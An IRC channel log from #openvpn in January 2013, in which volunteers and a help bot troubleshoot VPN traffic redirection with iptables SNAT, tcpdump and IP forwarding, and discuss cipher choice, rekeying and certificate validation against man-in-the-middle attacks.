-!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:27 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:29 -!- mode/#openvpn [+b *!*@static.88-198-57-152.clients.your-server.de] by ecrist 08:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:34 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 08:36 -!- Freeaqingme [~Freeaqing@91.214.168.110] has quit [Quit: ZNC - http://znc.in] 08:40 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 09:03 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Quit: Leaving] 09:25 -!- 
Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving]
09:27 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has joined #openvpn
09:56 -!- lipi [~lipi@69.204.223.87.dynamic.jazztel.es] has joined #openvpn
09:57 < lipi> hello, I would like to create a wizard that includes my certs by default, how can I do this?
09:57 < lipi> and to set openvpn with service mode and autoconnect at windows startup
10:00 -!- b1rkh0ff [~b1rkh0ff@178.77.21.223] has joined #openvpn
10:06 < lipi> on the other hand, do you think it is a very bad practice to give some clients the same certs?
10:06 < lipi> for example, I have an office with 4 static PCs always connected to my VPN.. so in order to minimize deployment costs I manage only 1 cert for these 4 hosts...
10:22 -!- master_of_master [~master_of@p57B53F05.dip.t-dialin.net] has quit [Ping timeout: 246 seconds]
10:24 -!- master_of_master [~master_of@p57B52132.dip.t-dialin.net] has joined #openvpn
10:31 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
10:53 -!- Guest15941 [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
10:53 -!- Guest15941 [~Cpt-Obliv@a202101.upc-a.chello.nl] has left #openvpn []
10:53 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
10:54 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn
10:54 < Cubox> !routing
10:54 < Cubox> !linrouting
10:54 < Cubox> ._.
10:54 < Cubox> !welcome
10:54 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
10:54 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
10:55 < Cubox> !linredirect
10:55 < Cubox> !redirect
10:55 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
10:55 <@vpnHelper> http://ircpimps.org/redirect.png
10:55 < Cubox> !ipforward
10:55 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward
10:55 < Cubox> !linipforward
10:55 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
11:02 < Cubox> Guess what, I can't route traffic. Using Arch, ufw. openvpn server and client can ping. Have this rule in iptables -t nat -S -A POSTROUTING -s 10.8.0.2/32 -o enp1s0:1 -j MASQUERADE
11:02 -!- Orbi [~opera@anon-149-217.vpn.ipredator.se] has joined #openvpn
11:07 < Cubox> enp1s0:1 is working
11:07 -!- lololojfegdiufhg [~root@thunderaan.cubox.me] has joined #openvpn
11:12 < Cubox> I have the /proc/sys rule for ip forwarding too.
11:17 <+pekster> lipi: You can write your own installation wrapper using NSIS or similar
11:18 <+pekster> lipi: As far as re-use of certs, it's allowed (as long as your server is configured to allow >1 connection from the same CN) but can cause problems if you ever need to revoke the cert of just 1 of the users or systems, or if you need to identify which user was using a specific IP
11:19 <+pekster> Cubox: What are you trying to do at a high level with openvpn? Redirect all traffic from a client?
11:20 < Cubox> Yep
11:20 < lololojfegdiufhg> redirect-gateway def1 too
11:20 < Cubox> I have push
11:20 < Cubox> Oops
11:20 < Cubox> I have push redirect-gateway def1 on config.
11:20 <+pekster> Cubox: Did you see the flowchart linked in the !redirect output? Follow that and feel free to ask if you get stuck
11:20 <+pekster> It helps guide you through all the steps required for that to work
11:21 < Cubox> firewall issue :P
11:22 <+pekster> Can you pastebin the output of 'iptables-save' ?
11:23 <+pekster> Labeling your interfaces before the output would be helpful too so I know what the uplink and tun devices are
11:23 < Cubox> iptables-save doesn't give anything...
11:23 <+pekster> It requires root access (like any netfilter command)
11:23 < Cubox> forgot this
11:23 < Cubox> pekster: gg
11:24 < Cubox> http://alduin.cubox.me/files/dump
11:24 < Cubox> you can add .txt if any
11:25 <+pekster> No need, although the MIME type from your server treats it as a binary stream
11:25 <+pekster> Oh, adding .txt to the URI gets your server to do the right thing
11:25 < Cubox> :)
11:26 < Cubox> pasting you ip addr
11:26 <+pekster> enp1s0:1 is your WAN/internet interface?
11:26 < Cubox> http://paste.placeholder.fr/show/172/
11:26 <+pekster> Ah, nvm, that explains it too :)
11:26 < Cubox> Yes
11:27 <+pekster> You should MASQUERADE the entire VPN network, not just that single host
11:27 < Cubox> I know, Just for migrating server
11:27 <+pekster> huh?
11:27 < Cubox> I need this computer to be linked first
11:27 < Cubox> This computer has its own ip address
11:28 <+pekster> Is the client actually using 10.8.0.2?
11:28 < Cubox> and the other computers will have the enp1s0 ip address
11:28 < Cubox> pekster: yes
11:28 < Cubox> pekster: I can ping it.
11:28 <+pekster> k
11:29 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving]
11:30 <+pekster> Looks like your FORWARD chain doesn't allow the traffic
11:31 < Cubox> Forward ...
11:31 <+pekster> You need a rule to allow it on the FORWARD chain (or a chain it calls) too, not just the SNAT/MASQUERADE rule
11:31 < Cubox> ╰─➤ cat /etc/default/ufw 1 ↵
11:31 < Cubox> DEFAULT_FORWARD_POLICY="ACCEPT"
11:31 < Cubox> (this is a part of the file)
11:31 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
11:31 -!- mode/#openvpn [+v s7r] by ChanServ
11:32 <+pekster> Oh, okay. I blindly assumed the 'ufw-reject-forward' chain would reject it; apparently not
11:32 <+pekster> (those are some ugly rules, but I guess I've just never seen ufw-generated rules before)
11:33 <+pekster> And ipforwarding is on? Can you 'cat /proc/sys/net/ipv4/ip_forward' and get 1?
11:33 < Cubox> Yep, 1
11:33 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection]
11:34 <+pekster> If you do a 'ping 4.2.2.1' or such client-side, can you tcpdump the tun0 interface and see packets?
11:34 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]]
11:35 <+pekster> The server-side firewall looks okay, given the ACCEPT policy on the FORWARD chain (ultimately you probably want to fix that, but it's okay for now for testing)
11:35 < Cubox> Doing that
11:37 < Cubox> 18:36:56.205183 IP 10.8.0.2 > 8.8.8.8: ICMP echo request, id 24294, seq 79, length 64
11:37 < Cubox> 18:36:56.610825 IP 10.8.0.2.54554 > Alduin.60001: UDP, length 94
11:37 < Cubox> 18:36:56.761679 IP Alduin > 10.8.0.2: ICMP Alduin udp port 60001 unreachable, length 130
11:38 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Read error: Connection reset by peer]
11:38 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn
11:38 < Cubox> strange o.O
11:38 <+pekster> So the ping goes through (not sure about that UDP stuff, but I'll happily ignore that for now.) You get no reply though
11:39 < Cubox> 18:37:09.216401 IP 10.8.0.2 > 8.8.8.8: ICMP echo request, id 24294, seq 92, length 64
11:39 < Cubox> and no reply
11:39 <+pekster> If you do the same dump on the outside-facing interface do you see the packet go out? 'tcpdump -pnvi enp1s0 and host 8.8.8.8' ?
11:39 <+pekster> (that tcpdump will make sure it doesn't spam you with normal traffic during the dump)
11:40 <+pekster> Erm, no 'and'
11:40 <+pekster> Just 'host 8.8.8.8'
11:41 <+pekster> Maybe it's not going out that interface?
11:41 < Cubox> enp1s0 or enp1s0:1 ?
11:41 <+pekster> If you get no traffic doing that tcpdump, please post output of 'ip route show table all'
11:41 <+pekster> Oh, right, 'enp1s0' since the alias is just that
11:41 <+pekster> My guess is that it's using the wrong interface, namely the primary IP on that interface, not the alias
11:42 <+pekster> Actually, you might be able to verify that via 'iptables -t nat -xnvL POSTROUTING' too
11:42 < Cubox> http://paste.placeholder.fr/show/173/
11:42 <+pekster> If you see a '0' in the packet column (that's the rule hitcount) then it's not getting matched
11:42 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
11:42 <+pekster> Yea, so you're not SNAT'ing the traffic
11:43 <+pekster> I don't think you can MASQUERADE on an alias like that
11:43 < Cubox> http://paste.placeholder.fr/show/174/
11:43 <+pekster> You can't magically make traffic come from a 2nd IP like that; you need routing rules/tables to do that
11:45 < Cubox> hmm
11:45 <+pekster> Cubox: So, that default route on line 2 of the route output, means that it goes out via the primary IP of enp1s0, not any of the secondary ones
11:45 <+pekster> You can't match on an alias like that in netfilter, because the alias doesn't actually exist (it's just a 2nd IP on the same interface)
11:46 < Cubox> yeah, I see
11:46 <+pekster> If you want to use a 2nd upstream IP, you need to specifically declare it in the 'src' attribute of a routing table entry, and if you don't want that to be the default for all packets, you must define routing rules to send the traffic to a non-default routing table
11:46 <+pekster> see 'man ip' for the syntax, and 'ip route help' and 'ip rule help' for rule/route specific usage commands
11:46 <+pekster> It's non-trivial to set up policy routing like that
11:47 <+pekster> Here's a nifty guide from the LARTC group: http://lartc.org/howto/
11:47 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 256 seconds]
11:47 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org)
11:47 <+pekster> If you're already very familiar with 'ip' command usage, you can skip to chapter 4. Otherwise, starting at the beginning will help you understand what's going on
11:48 <+pekster> Cubox: Hmm, maybe you can try using -j SNAT --to-source 192.95.18.155 ?
11:48 <+pekster> I don't actually know if that does the right thing or not, but it might be worth a shot
11:49 <+pekster> Since it's the same interface, it might just work. Also change your -o to read simply '-o enp1s0' without the alias
11:49 < Cubox> pekster: Where do I add this ?
11:50 <+pekster> In the firewall output you gave me, change line 7 to read like so: -A POSTROUTING -s 10.8.0.2/32 -o enp1s0 -j SNAT --to-source 192.95.18.155
11:52 < Cubox> zomfg
11:52 < Cubox> pekster: Marry me.
11:52 < Cubox> pekster: are you a girl ?
11:52 <+pekster> Congrats. And I'm merely a screenname on the Internet
11:53 <+pekster> So, the issue is that the MASQUERADE target always uses the primary IP of an interface (see the iptables-extensions manpage for details)
11:53 < Cubox> yeah
11:53 <+pekster> You didn't want that, and your routing table already handled the next-hop properly
11:53 <+pekster> Normally you can't use SNAT like that, but both your different IPs are on the same interface, so it all works out without the work of defining policy routing
11:54 < Cubox> :)
11:54 < Cubox> Thanks :)
11:54 <+pekster> Yup
11:54 < Cubox> Next step : IPv6
11:54 < Cubox> but not today !
11:54 <+pekster> At least there's no NAT there...
11:54 < Cubox> yes.
11:54 < Cubox> but I'm not really good at routing :P
11:55 < Cubox> especially with IPv6
11:55 <+pekster> Same game, bigger numbers
11:55 < Cubox> yeah
11:56 -!- lololojfegdiufhg [~root@thunderaan.cubox.me] has quit [Quit: WeeChat 0.3.9.2]
11:59 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Read error: Operation timed out]
12:22 -!- AlbinoGeek [AcademyInt@academyintl/director/AcademyIntl] has quit [Quit: I need a new quit message.]
12:28 -!- lipi [~lipi@69.204.223.87.dynamic.jazztel.es] has quit [Quit: Me'n vaig]
12:36 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
12:39 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection]
12:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
12:54 -!- Tomoyo [Wintereise@113.11.122.231] has joined #openvpn
12:54 -!- Tomoyo is now known as Guest47194
12:58 -!- Wintereise [Wintereise@113.11.122.231] has quit [Ping timeout: 248 seconds]
13:02 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
13:03 -!- Orbi [~opera@anon-149-217.vpn.ipredator.se] has quit [Ping timeout: 245 seconds]
13:06 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds]
13:07 -!- [fred] [fred@konfuzi.us] has joined #openvpn
13:07 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has quit [Ping timeout: 246 seconds]
13:08 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn
13:11 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn
13:13 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
13:14 -!- Guest47194 [Wintereise@113.11.122.231] has quit [Ping timeout: 256 seconds]
13:26 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
13:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
13:29 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
13:45 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn
13:52 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Quit: Rolybrau]
14:11 -!- Porkepix [~Porkepix@lns-bzn-45-82-65-137-188.adsl.proxad.net] has quit [Ping timeout: 260 seconds]
14:13 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-63-56.adsl.proxad.net] has joined #openvpn
14:26 -!- frsk [fredrik@joy.frsk.net] has joined #openvpn
14:29 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn
14:30 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 240 seconds]
14:37 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
15:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:32 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.4.0-rc1"]
15:48 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn
15:50 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn
15:50 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit []
15:53 -!- Cubox` [cubox@unaffiliated/cubox] has joined #openvpn
15:53 -!- Cubox [cubox@unaffiliated/cubox] has quit [Client Quit]
15:53 -!- Cubox` [cubox@unaffiliated/cubox] has quit [Client Quit]
15:54 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn
15:59 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.3.9.2"]
16:27 -!- gffa [~unknown@unaffiliated/gffa] has quit [Ping timeout: 252 seconds]
16:36 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds]
17:32 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has joined #openvpn
17:45 < Tativie> I am getting "WARNING: No server certificate verification method has been enabled." however the session seems to work well. However, the session seems to reset the key every 30 or so minutes: "TLS: tls_process: killed expiring key" Is this something I should be concerned with? I would like for the encryption to be as strong as possible, even at the expense of speed.
17:51 < Tativie> From the site "SSL/TLS renegotiation handshake which occurs once per client per hour" hmm maybe that is all I am seeing?
17:53 < Tativie> Looks like "cipher AES-256-CBC" might be a good choice? Or is there a stronger one? Is blowfish's 128 better in some ways?
17:55 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.]
17:56 < Tativie> "http://infocenter.sybase.com/help/topic/com.sybase.infocenter.dc71335.1502/html/aserbwin/aserbwin27.htm" suggests "TLS_RSA_WITH_AES_256_CBC_SHA" is the strongest? Any advice?
18:10 < Tativie> Maybe I should try adding 'persist-key' & 'persist-tun' in the .conf?
18:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
18:13 < dioz> sounds reasonable
18:18 -!- Guest19661 [~LaStik@62.109.16.198] has quit [Quit: Peace.]
18:19 < Tativie> dioz, does having a short lived key have any advantages?
18:20 -!- b1rkh0ff [~b1rkh0ff@178.77.21.223] has quit [Ping timeout: 252 seconds]
18:20 < dioz> in terms of data encryption yeah it probably would
18:21 < dioz> if the party changes keys used at regular intervals
18:33 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has joined #openvpn
18:47 <+pekster> Tativie: You have 2 choices for cipher/auth: one for the TLS control channel, and another for the data encryption/hash. I prefer blowfish (I tend to use 128 or 256-bit symmetric keys for that) as BF is generally faster during encryption and only slower during re-keying (which doesn't matter since you have a grace window anyway)
18:47 <+pekster> Tativie: You can improve your security against MITM downgrade attacks by limiting your allowed TLS ciphers to only those you select, or just a single one
18:48 <+pekster> As far as re-keying, the default values are probably fine; I tend to lower my tran-window to about 10 minutes instead of the default of 60, but that's just preference really
18:50 < Tativie> pekster: what line would I need to put in the .conf for 'cipher blowfish 256-bit symmetric key' and what would I need to put in the .conf to change the re-keying time to 10 minutes?
18:50 <+pekster> See 'openvpn --show-ciphers' for a cipher list that you use with the 'cipher' directive in the config file
18:51 <+pekster> The default keysize is used, unless the 'keysize' directive is specified
18:51 < Tativie> Also should I use 'user nobody' & 'group nobody' on both server and client side .conf files?
18:51 <+pekster> See also: --tran-window for the time the old key is valid after symmetric re-key is initiated
18:52 <+pekster> Tativie: Mixed bag as far as user downgrade.
It can help if the application is ever compromised, but it means you must use --persist-key and possibly --persist-tun (depending on scripts/configuration) which lowers security slightly in the sense that the key material is in-RAM all the time 18:53 <+pekster> That's "usually" okay in a proper Unix-like environment with mlock, although I tend not to downgrade since it causes me more problems with my dynamic firewalling/routing I do on many of my VPN servers 18:53 <+pekster> Ultimately you need to figure out what method you consider more secure 18:54 <+pekster> Here's my "standard" boilerplate TLS setup: http://fpaste.org/afNV/ 18:54 <+pekster> (you can use line 6 or 7 as you prefer based on how you sign your certs) 18:55 <+pekster> I just use the EKU only, so I use that as my client/server differentiator 18:55 <+pekster> Same for the client, but it has the server/TLS Web Server Authentication values for the remote cert 18:57 < Tativie> hmm. okay. Thanks for the help. I think that I need to do some more research to understand it better. I'm not even sure if I signed the certs right or not. But it does seem to be working.
18:58 <+pekster> The warning you get means that another valid client could pose as a server to the system issuing that warning 18:59 <+pekster> You should use a remote-cert validation method to restrict the client to talk to only certs that have been designated as a "server" cert; if you use easy-rsa it does that for you, or you can use the proper KU/EKU/ns-cert-type values yourself when you sign (if you manage your own PKI) 18:59 <+pekster> See: 18:59 <+pekster> !mitm 18:59 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 18:59 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has left #openvpn [] 19:02 < Tativie> Thanks, I will check it out and try setting it up sometime. 19:03 <+pekster> !mitm forget 3 19:04 <+pekster> !forget mitm 3 19:04 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 19:04 <+pekster> :\ 19:05 <+pekster> That should be remote-cert-tls as the new-and-preferred method 19:10 < Tativie> It looks like the server .conf file already has the persist-tun and persist-key active. Is the client does specify it also it uses expiring keys? 19:11 < Tativie> If the client does* 19:11 < Tativie> *does not specify* 19:11 <+pekster> All the --persist-* options only impact the local side, not the remote 19:11 <+pekster> It's for the X509 keys, not the ephemeral symmetric ones 19:12 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has quit [Ping timeout: 246 seconds] 19:16 < Tativie> hmm, okay. 
I don't fully understand, but I take it that means the server .conf's use of the persist options does not really matter for my current session? 19:18 <+pekster> I don't understand the question 19:24 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Quit: leaving] 19:26 -!- Guest47194 [~reise@180.210.201.168] has joined #openvpn 19:27 -!- Wintereise [Wintereise@113.11.122.231] has quit [Ping timeout: 246 seconds] 20:09 -!- HyperGlide [~HyperGlid@182.151.63.232] has joined #openvpn 20:18 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 248 seconds] 20:45 -!- HyperGlide [~HyperGlid@182.151.63.232] has quit [Remote host closed the connection] 20:45 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 20:47 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:51 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 20:55 -!- mojtaba [~Thunderbi@CPE0026f321a168-CM0026f321a165.cpe.net.cable.rogers.com] has joined #openvpn 20:55 < mojtaba> Hi 20:55 < mojtaba> I have just installed openvpn 20:55 < mojtaba> Is there anybody who can help me to configure it? 20:55 < mojtaba> I have installed it on latest version of Ubuntu 20:56 < mojtaba> and would like to connect to it with windows clients and also with android mobile clients. 20:56 < mojtaba> I am also pretty new to Linux era. 20:56 < mojtaba> Any simplified help is highly appreciated. 20:57 < mojtaba> Is anybody there? 20:57 < mojtaba> hello? 20:57 < dioz> hi 20:57 < mojtaba> dioz: hi 20:57 < mojtaba> Can you help me? 20:58 < dioz> !welcome 20:58 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. 
|| !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 20:58 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 20:59 < mojtaba> vpnHelper: Could you explain more, (sorry), I am also new to IRC. 20:59 < mojtaba> I would like to access internet through openvpn to bypass filtering. 21:00 < mojtaba> I am going to set it up in my home and go to trip. 21:02 < mojtaba> hello? 21:02 < mojtaba> Anybody there? 21:27 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds] 21:40 < EugeneKay> Nope. 21:40 < EugeneKay> !howto 21:40 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:40 < EugeneKay> !redirect 21:40 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 21:40 <@vpnHelper> http://ircpimps.org/redirect.png 21:41 < EugeneKay> Getting the basic VPN working(being able to ping over the tun interface) is the hardest part, because of the PKI stuff. 21:41 < EugeneKay> The howto covers it all pretty well. 
21:41 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 22:00 -!- black_ [black@2001:470:8cf8::29] has joined #openvpn 22:00 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Quit: Leaving] 22:00 -!- black_ is now known as blackmagic 22:04 -!- blackmagic [black@2001:470:8cf8::29] has quit [Quit: ZNC - http://znc.in] 22:49 -!- blackmagic [black@2001:470:8cf8::29] has joined #openvpn 23:35 -!- blackmagic [black@2001:470:8cf8::29] has quit [Quit: ZNC - http://znc.in] 23:40 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn --- Day changed Mon Jan 21 2013 00:04 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has quit [Quit: Leaving.] 00:07 -!- mojtaba [~Thunderbi@CPE0026f321a168-CM0026f321a165.cpe.net.cable.rogers.com] has quit [Quit: mojtaba] 00:08 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has joined #openvpn 00:38 -!- EugeneKay [eugene@itvends.com] has quit [Quit: ZNC - http://znc.in] 00:38 -!- EugeneKay [eugene@stretchmyan.us] has joined #openvpn 00:49 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 00:59 -!- Guest47194 [~reise@180.210.201.168] has quit [Ping timeout: 244 seconds] 01:00 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 01:00 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 01:00 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 01:15 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 01:33 -!- Friberg [~Friberg@h-223-133.a176.priv.bahnhof.se] has quit [Ping timeout: 255 seconds] 01:47 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 01:47 < Minnebo> !bridge 01:48 <@vpnHelper> "bridge" is (#1) http://openvpn.net/index.php/documentation/miscellaneous/ethernet-bridging.html for the doc or (#2) http://openvpn.net/index.php/documentation/faq.html#bridge1 for info from the FAQ or (#3) also see !tunortap and !layer2 and read --server-bridge in the manual (!man) or (#4) also see !whybridge 01:48 < 
Minnebo> !whybridge 01:48 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 01:58 < Minnebo> openvpn is a pain in the ass 01:58 < Minnebo> i guess i will install pfsense 02:13 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 02:13 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 02:18 -!- ade_b [~Ade@109.58.66.70.bredband.tre.se] has joined #openvpn 02:18 -!- ade_b [~Ade@109.58.66.70.bredband.tre.se] has quit [Changing host] 02:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:18 -!- thinkHell [~Hell@85.15.47.27] has quit [Quit: ["pop()"]] 03:38 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:14 -!- fling [~fling@fsf/member/fling] has joined #openvpn 04:15 < fling> how to remove a key from easy-rsa base? 04:15 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 04:17 < fling> do I need to just delete files? what about .pem? 
04:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 04:52 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 248 seconds] 04:55 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 05:02 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Ping timeout: 246 seconds] 05:03 -!- HyperGlide [~HyperGlid@182.149.69.53] has joined #openvpn 05:23 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 244 seconds] 05:25 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 05:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 05:41 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 05:47 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 05:55 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 05:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds] 06:03 -!- dydzEz2_ [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 06:05 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 244 seconds] 06:06 -!- dydzEz2 [dydzEz2@c-67-163-13-78.hsd1.il.comcast.net] has quit [Ping timeout: 248 seconds] 06:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 06:11 -!- ikonia [~irc@unaffiliated/ikonia] has left #openvpn [] 06:13 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds] 06:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:15 -!- HyperGlide [~HyperGlid@182.149.69.53] has quit [Remote host closed the connection] 06:16 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 248 seconds] 06:16 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 06:16 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 06:18 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 06:19 -!- ade_b 
